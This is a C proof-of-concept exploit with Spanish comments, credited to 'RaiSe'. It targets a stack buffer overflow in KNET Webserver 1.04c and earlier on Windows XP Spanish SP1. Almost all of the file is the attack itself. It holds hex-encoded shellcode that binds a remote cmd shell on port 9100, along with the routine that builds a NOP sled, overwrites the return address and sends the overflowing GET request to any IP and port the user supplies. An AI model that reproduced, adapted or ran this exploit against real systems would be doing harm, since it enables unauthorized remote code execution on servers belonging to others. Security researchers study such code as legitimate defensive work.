/*
 *  KNET Webserver (<= 1.04c) PoC Exploit
 *
 *  Testeado en Windows XP Spanish SP1 con KNET 1.04c
 *  Da una cmd shell remota en el puerto 9100
 *
 *  Debido a que el server usa la pila para guardar datos
 *  como el directorio web, o las peticiones web anteriores,
 *  no es posible averiguar el pad para que la direccion
 *  quede alineada, por lo que hay que probar con valores entre
 *  0 y 3. Por otro lado aunque la shellcode utilizada no usa
 *  direcciones hardcodeadas la direccion de salto del overflow
 *  pertenece a una dll, por lo que es posible que no funcione
 *  en un Windows diferente al XP Spanish SP1.
 *
 *  By RaiSe
 *     <raise@enye-sec.org>
 *     http://www.enye-sec.org
 */


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <signal.h>
#include <unistd.h>


char shellcode[] =
// cmd shell on 9100 port, by RaiSe <raise@enye-sec.org>
"\xeb\x08\x90\x90\x90\xeb\x08\x90\x90\x90\xe8\xf6\xff\xff\xff\x58\x66\x05\xaa"
"\x01\x8b\xd8\x24\xfc\x8d\x80\xac\xfd\xff\xff\x8b\xe8\x8d\x80\xac\xfe\xff\xff"
"\x8b\xe0\x89\x5d\x10\x32\xd2\x88\x53\x0e\x88\x53\x1b\x88\x53\x26\x88\x53\x31"
"\x88\x53\x3c\x88\x53\x41\x88\x53\x48\x88\x53\x4f\x88\x53\x5e\x88\x53\x6a\x88"
"\x53\x6e\x33\xd2\xb2\x30\x64\x8b\x1a\x8b\x5b\x0c\x8b\x5b\x0c\x8b\x1b\x8b\x1b"
"\x8b\x5b\x18\x89\x5d\x14\x8b\x7b\x3c\x03\xfb\x8b\x57\x78\x03\xd3\x8d\x4a\x1f"
"\x41\x8b\x01\x03\xc3\x33\xc9\x52\x8b\xd3\x50\x5b\x33\xc0\xfc\x8b\x3b\x03\xfa"
"\x8b\x75\x10\x33\xc9\xb1\x0e\xf3\xa6\x74\x0b\x90\x90\x90\x90\x83\xc3\x04\x40"
"\xeb\xe7\x90\x5a\x8b\xc8\x8b\x45\x14\x8b\x5a\x24\x03\xd8\x33\xff\x66\x8b\x3c"
"\x4b\x8b\x4a\x1c\x03\xc8\x8b\x34\xb9\x03\xf0\x89\x75\x18\x8b\x5d\x10\x8d\x5b"
"\x0f\x53\x8b\x4d\x14\x51\xff\xd6\x8d\x5b\x0c\x43\x53\xff\xd0\x89\x45\x1c\x8b"
"\xfb\x8b\xd0\x8d\x5d\x24\x33\xc9\xb1\x07\x51\x33\xc9\x49\x32\xc0\xf2\xae\x52"
"\x57\x52\x8b\x75\x18\xff\xd6\x5a\x89\x03\x43\x43\x43\x43\x59\x80\xf9\x03\x75"
"\x07\x90\x90\x90\x90\x8b\x55\x14\xe2\xda\x8d\x95\xfc\xfd\xff\xff\x52\x33\xd2"
"\x66\xba\x01\x01\x52\x8b\x5d\x24\xff\xd3\x33\xd2\x52\x52\x52\x52\x42\x52\x42"
"\x52\x8b\x5d\x28\xff\xd3\x89\x45\x40\x33\xd2\x52\x66\xba\x23\x8c\x66\x52\x66"
"\x33\xd2\xb2\x02\x66\x52\x8b\xdc\xb2\x16\x52\x53\x50\x8b\x75\x2c\xff\xd6\x33"
"\xd2\xb2\x05\x52\x8b\x55\x40\x52\x8b\x75\x30\xff\xd6\x33\xd2\xb2\x16\x52\x54"
"\x8d\x55\xb0\x52\x8b\x55\x40\x52\x8b\x75\x34\xff\xd6\x8b\xf0\x33\xc9\x66\xb9"
"\x21\x01\x66\x49\x8d\xbd\xb0\xfe\xff\xff\x33\xc0\xf3\xaa\x8d\xbd\xb0\xfe\xff"
"\xff\xc6\x07\x44\x89\x77\x38\x89\x77\x3c\x89\x77\x40\x66\xc7\x47\x2c\x01\x01"
"\x8d\x95\xb0\xfe\xff\xff\x8d\x52\xac\x52\x57\x33\xd2\x52\x52\x52\x42\x52\x4a"
"\x52\x52\x8b\x7d\x10\x8d\x7f\x6b\x57\x52\x8b\x75\x38\xff\xd6\x33\xd2\x52\x8b"
"\x75\x3c\xff\xd6\x47\x65\x74\x50\x72\x6f\x63\x41\x64\x64\x72\x65\x73\x73\x08"
"\x4c\x6f\x61\x64\x4c\x69\x62\x72\x61\x72\x79\x41\x08\x77\x73\x32\x5f\x33\x32"
"\x2e\x64\x6c\x6c\x08\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\x08\x57\x53\x41"
"\x53\x6f\x63\x6b\x65\x74\x41\x08\x62\x69\x6e\x64\x08\x6c\x69\x73\x74\x65\x6e"
"\x08\x61\x63\x63\x65\x70\x74\x08\x43\x72\x65\x61\x74\x65\x50\x72\x6f\x63\x65"
"\x73\x73\x41\x08\x45\x78\x69\x74\x50\x72\x6f\x63\x65\x73\x73\x08\x63\x6d\x64"
"\x08";


int main(int argc, char *argv[])
{
int port, soc, i, pad, n;
unsigned long *p;
struct sockaddr_in dire;
char buf[3072], buf2[3072];


if (argc < 3)
	{
   fprintf(stderr, "\nUso: %s ip_destino puerto [pad]\npad: 0-3\n"
           "\nEjemplo: %s 1.1.1.1 80 2\n", argv[0], argv[0]);
   exit(-1);
   }


port = atoi(argv[2]);

if (argc == 4)
   pad = atoi(argv[3]);
else
    pad = 0;

    
if ((pad < 0) || (pad > 3))
	{
   fprintf(stderr, "\nUso: %s ip_destino puerto [pad]\npad: 0-3\n"
           "\nEjemplo: %s 1.1.1.1 80 2\n", argv[0], argv[0]);
   exit(-1);
   }
    

if ((soc = socket(AF_INET, SOCK_STREAM, 0)) == -1)
	{
	fprintf(stderr, "Error al crear el socket.\n");
	exit(-1);
	}


bzero((void *) &dire, sizeof(dire));
dire.sin_family = AF_INET;
dire.sin_port = htons(port);
dire.sin_addr.s_addr = inet_addr(argv[1]);


if (connect(soc, (struct sockaddr *) &dire, sizeof(dire)) == -1)
	{
	fprintf(stderr, "Error al conectar el socket.\n");
	exit(-1);
	}


bzero((char *) buf, sizeof(buf));
bzero((char *) buf2, sizeof(buf2));


for (i=0; i < 400+pad; i++)
    buf[i] = 0x90;

for (i=0; i < strlen(shellcode); i++)
    buf[i+400+pad] = shellcode[i];

p = (unsigned long *) &buf[400+pad+strlen(shellcode)];

for (i=400+pad+strlen(shellcode); i < 1150; i+=4)
    *(p++) = (unsigned long) 0x77222240;

n = strlen(buf);    

for (i=0; i < 8; i++)
    buf[n+i] = 0x90;
  
buf[n+8] = 0x66;
buf[n+9] = 0x33;
buf[n+10] = 0xc0;
buf[n+11] = 0xb0;
buf[n+12] = 0xa0;
buf[n+13] = 0x66;
buf[n+14] = 0x50;
buf[n+15] = 0x66;
buf[n+16] = 0xb8;
buf[n+17] = 0xd1;
buf[n+18] = 0xfa;
buf[n+19] = 0x66;
buf[n+20] = 0x50;
buf[n+21] = 0xc3;

sprintf(buf2, "GET %s \r\n\r\n", buf);
write(soc, buf2, strlen(buf2));

close(soc);
exit(0);

} /********** fin de main () ***********/


/* EOF */